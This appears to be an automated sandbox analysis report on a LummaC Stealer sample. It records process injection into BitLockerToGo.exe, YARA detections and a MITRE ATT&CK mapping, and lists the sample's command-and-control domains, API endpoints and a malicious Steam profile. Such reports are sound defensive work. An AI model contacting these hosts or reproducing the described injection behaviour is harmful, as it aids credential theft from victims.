                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: dividenntykw.shop
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000Jump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A2C008Jump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Users\user\Desktop\BW4pTs1x3V.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Go Injector
                Source: Yara matchFile source: BW4pTs1x3V.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BW4pTs1x3V.exe PID: 1668, type: MEMORYSTR
                Yara detected LummaC Stealer
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Go Injector
                Source: Yara matchFile source: BW4pTs1x3V.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BW4pTs1x3V.exe PID: 1668, type: MEMORYSTR
                Yara detected LummaC Stealer
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		311
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                Security Software Discovery                		Remote Services1
                Screen Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                Process Injection                		Security Account Manager12
                System Information Discovery                		SMB/Windows Admin Shares2
                Clipboard Data                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information                		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BW4pTs1x3V.exe61%ReversingLabsWin64.Trojan.LummaStealer

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://player.vimeo.com0%URL Reputationsafe
                https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                http://www.certum.pl/CPS00%URL Reputationsafe
                https://steam.tv/0%URL Reputationsafe
                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                https://store.steampowered.com/points/shop/0%URL Reputationsafe
                https://lv.queniujq.cn0%URL Reputationsafe
                https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                https://checkout.steampowered.com/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                https://store.steampowered.com/;0%URL Reputationsafe
                https://store.steampowered.com/about/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                https://help.steampowered.com/en/0%URL Reputationsafe
                https://store.steampowered.com/news/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
                https://store.steampowered.com/stats/0%URL Reputationsafe
                https://medal.tv0%URL Reputationsafe
                https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dividenntykw.shop
                		172.67.188.210
                		truetrue
                  		unknown
                  steamcommunity.com
                  		104.102.49.254
                  		truefalse
                    		unknown
                    gravvitywio.store
                    		172.67.209.193
                    		truetrue
                      		unknown
                      fragnantbui.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        gutterydhowi.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          offensivedzvju.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            stogeneratmns.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              reinforcenh.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                drawzhotdog.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  ghostreedmnu.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    vozmeatillu.shop
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      reinforcenh.shoptrue
                                        		unknown
                                        stogeneratmns.shoptrue
                                          		unknown
                                          ghostreedmnu.shoptrue
                                            		unknown
                                            https://dividenntykw.shop/apitrue
                                              		unknown
                                              https://steamcommunity.com/profiles/76561199724331900true
                                              • URL Reputation: malware
                                              		unknown
                                              fragnantbui.shoptrue
                                                		unknown
                                                offensivedzvju.shoptrue
                                                  		unknown
                                                  drawzhotdog.shoptrue
                                                    		unknown
                                                    vozmeatillu.shoptrue
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://player.vimeo.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdn.discordapp.com/icons/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cdn.discordapp.com/banners/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://cdn.discordapp.com/guilds/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://discord.com/api/v9/oauth2/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://discord.com/api/v9/gateway/botBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://discord.com/api/v9/guilds/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&amp;l=eBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.youtube.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://gravvitywio.store/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.google.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshallBW4pTs1x3V.exefalse
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://discord.com/api/v9/users/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://cdn.discordapp.com/attachments/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://s.ytimg.com;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://discord.com/api/v9/stage-instancesBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.certum.pl/CPS0BW4pTs1x3V.exefalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://steam.tv/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://discord.com/api/v9//voice/regionsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://cevcsca2021.ocsp-certum.com07BW4pTs1x3V.exefalse
                                                                                              		unknown
                                                                                              https://status.discord.com/api/v2/scheduled-maintenances/upcoming.jsonBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wBW4pTs1x3V.exefalse
                                                                                                  		unknown
                                                                                                  https://discord.com/api/v9/applicationsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://sketchfab.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • URL Reputation: malware
                                                                                                      		unknown
                                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://cdn.discordapp.com/role-icons/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://vozmeatillu.shop/apixBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://discord.com/api/v9/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://discord.com/api/v9/09Az~~BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://dividenntykw.shop/tBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.google.com/recaptcha/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://checkout.steampowered.com/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://gravvitywio.store:443/apifiles/76561199724331900BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
